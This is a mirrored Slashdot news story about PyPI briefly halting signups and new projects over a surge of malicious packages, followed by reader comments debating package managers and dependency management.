Python's PyPi Package Repository Temporarily Halted New Signups, Citing 'Volume...
source link: https://developers.slashdot.org/story/23/05/21/2340220/pythons-pypi-package-repository-temporarily-halted-new-signups-citing-volume-of-malicious-projects
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Python's PyPi Package Repository Temporarily Halted New Signups, Citing 'Volume of Malicious Projects'
On Saturday PyPI, the official third-party registry of open source Python packages, "temporarily suspended new users from signing up, and new projects from being uploaded to the platform" reports BleepingComputer.
"The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave," stated an incident notice posted by PyPI admins Saturday.
Hours ago they posted a four-word update: "Suspension has been lifted." No details were provided, but The Hacker News writes the incident "comes as software registries such as PyPI have proven time and time again to be a popular target for attackers looking to poison the software supply chain and compromise developer environments."
Earlier this week, Israeli cybersecurity startup Phylum uncovered an active malware campaign that leverages OpenAI ChatGPT-themed lures to bait developers into downloading a malicious Python module capable of stealing clipboard content in order to hijack cryptocurrency transactions. ReversingLabs, in a similar discovery, identified multiple npm packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent in the npm repository that drops a trojan called TurkoRat.
›
I never really got the appeal of these "package managers" that are language specific. Too much proprietary tech constantly trying to re-invent the wheel.
In all my projects, I just use Git submodules. It is language and OS agnostic. If I need to make changes and fix bugs in any of the modules, I already have an easy way to commit them back upstream. I don't need to worry about malicious code in repositories, because its all decentralized. If someone else clones my repo, they're cleaning exact git commit hash
-
You've clearly not worked in projects with many dependencies and each dependency having their own set of dependencies. Git submodules requires you to manage everything of every other submodule by hand. How do you deal with vulnerabilities within specific versions? What about conflicts between 2 projects? Submodules was never intended for what you use it.
-
Sounds like a terrible design.
-
More like don't reinvent the wheel, sure you can write it all yourself, and if you are working inside a massive multinational or high security/risk environment you probably should, but go tell a client that the software he wants cost 10x more, lets see how many projects you'll be allowed to build.
-
-
The whole system is a mess. It's like people have never heard of a stable API. Public repos are rarely policed properly either, both for malware and for automated testing. It wouldn't be hard to have PyPi require a decent test suite and builds that pass it, especially for popular projects where breakage will cause a lot of problems.
-
-
Having a broad variety of open source tools, some of which are _the_ reference tool, is useful. It happened with Perl, and Java, and is being tried with flatpacks and golang and tust. There are problems: ridiculous chains of unreliable and unpredictably incompatible dependencies are one of the risks we've seen with all of these packaging systems. Each language feels the need to re-invent the wheel because they drive on slightly different roads.
-
-
Like all the replacements for "old" tools that were just fine for decades. Traceroute, nslookup, ifconfig, etc etc. Tell me again why nslookup was retired and moved to legacy support?
-
Because nslookup is architecturally flawed. It doesn't use bind for looksups but a separate library and algorithm and makes queries not inquired about and can give errors in unexpected ways and can fail in ways that can give misleading or incorrect errors and is semi useless for diagnosing local issues as it steps around the local system and then makes queries that are semi nonsensical that sort of made sense back when internet connections were generally intermittent and UUCP was a common way to communica
-
-
It's because they have looked at what has gone before and realized how bad it is and thought "well, even if my new package manger is garbage at least my new package manager won't have these problems all of the other ones have"
Of the last 20 software projects I had some responsibility for securing they averaged just over 1,000 external dependancies per project. The fact that modern package managers even semi support this is both amazing and terrifying. There are real issues in trying to maintain the secu
-
-
-
I never really got the appeal of these "package managers" that are language specific. Too much proprietary tech constantly trying to re-invent the wheel.
Let me count the ways.
1) Hackers are constantly prying into libraries looking for vunerabilities. You are not a security expert, you didnt write the code and you probably dont have time to inspect the entire codebase (especially if its a big one). Modern dependency management gives you access to tools to ensure your notified when vunerabilities are found in
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK